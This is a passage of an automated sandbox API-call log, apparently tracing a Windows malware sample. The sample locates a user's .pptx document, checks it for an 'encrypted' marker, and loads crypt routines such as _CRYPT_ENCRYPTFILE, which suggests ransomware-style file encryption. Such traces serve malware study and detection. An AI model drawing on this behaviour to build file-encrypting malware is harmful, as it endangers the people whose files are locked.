hHeap=0x770000) returned 1 [0032.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0032.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0032.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0032.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0032.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.879] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0032.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0032.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0032.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0032.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0032.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0032.879] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.879] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0032.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0032.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0032.879] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.879] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0032.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0032.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0032.879] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0032.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0032.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0032.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0032.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0032.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0032.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0032.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0032.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0032.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0032.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.879] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.879] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.880] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.880] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.880] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\AzDr3IFFhU3nWRTgjj.pptx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b3eda00, ftCreationTime.dwHighDateTime=0x1d5583e, ftLastAccessTime.dwLowDateTime=0x65595e60, ftLastAccessTime.dwHighDateTime=0x1d5ac04, ftLastWriteTime.dwLowDateTime=0x65595e60, ftLastWriteTime.dwHighDateTime=0x1d5ac04, nFileSizeHigh=0x0, nFileSizeLow=0xfc8e, dwReserved0=0x0, dwReserved1=0x777648, cFileName="AzDr3IFFhU3nWRTgjj.pptx", cAlternateFileName="AZDR3I~1.PPT")) returned 0x7c20c0 [0032.880] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0032.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0032.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0032.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0032.880] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.880] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\AzDr3IFFhU3nWRTgjj.pptx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b3eda00, ftCreationTime.dwHighDateTime=0x1d5583e, ftLastAccessTime.dwLowDateTime=0x65595e60, ftLastAccessTime.dwHighDateTime=0x1d5ac04, ftLastWriteTime.dwLowDateTime=0x65595e60, ftLastWriteTime.dwHighDateTime=0x1d5ac04, nFileSizeHigh=0x0, nFileSizeLow=0xfc8e, dwReserved0=0x0, dwReserved1=0x777648, cFileName="AzDr3IFFhU3nWRTgjj.pptx", cAlternateFileName="AZDR3I~1.PPT")) returned 0x7c20c0 [0032.880] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0032.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0032.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0032.880] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0032.880] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\AzDr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\AzDr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\AzDr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\AzDr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\AzDr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\AzDr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\AzDr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\AzDr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\AzDr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\AzDr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\AzDr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\AzDr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\AzDr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\AzDr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\AzDr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\AzDr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\AzDr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\AzDr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\AzDr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\AzDr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\AzDr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\AzDr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\AzDr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\AzDr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\AzDr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\AzDr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\AzDr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\AzDr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\AzDr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\AzDr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\AzDr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\AzDr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\AzDr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\AzDr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\AzDr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\AzDr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\AzDr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\AzDr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\AzDr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\AzDr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\AzDr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AzDr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zDr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Dr3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IFFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FFhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FhU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hU3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nWRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WRTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Tgjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gjj.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0032.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0032.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0032.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0032.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0032.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0032.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0032.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0032.882] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.882] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0032.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0032.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0032.882] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0032.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0032.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0032.882] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0032.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0032.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0032.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0032.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0032.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0032.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0032.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0032.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0032.883] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.883] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.883] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.883] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.883] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.883] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\AzDr3IFFhU3nWRTgjj.pptx", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b3eda00, ftCreationTime.dwHighDateTime=0x1d5583e, ftLastAccessTime.dwLowDateTime=0x65595e60, ftLastAccessTime.dwHighDateTime=0x1d5ac04, ftLastWriteTime.dwLowDateTime=0x65595e60, ftLastWriteTime.dwHighDateTime=0x1d5ac04, nFileSizeHigh=0x0, nFileSizeLow=0xfc8e, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="AzDr3IFFhU3nWRTgjj.pptx", cAlternateFileName="AZDR3I~1.PPT")) returned 0x7c2100 [0032.883] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0032.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0032.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0032.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0032.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.883] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.883] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0032.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0032.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0032.883] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.883] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0032.883] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0032.883] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.883] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0032.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0032.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0032.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0032.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0032.884] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.884] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.884] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: 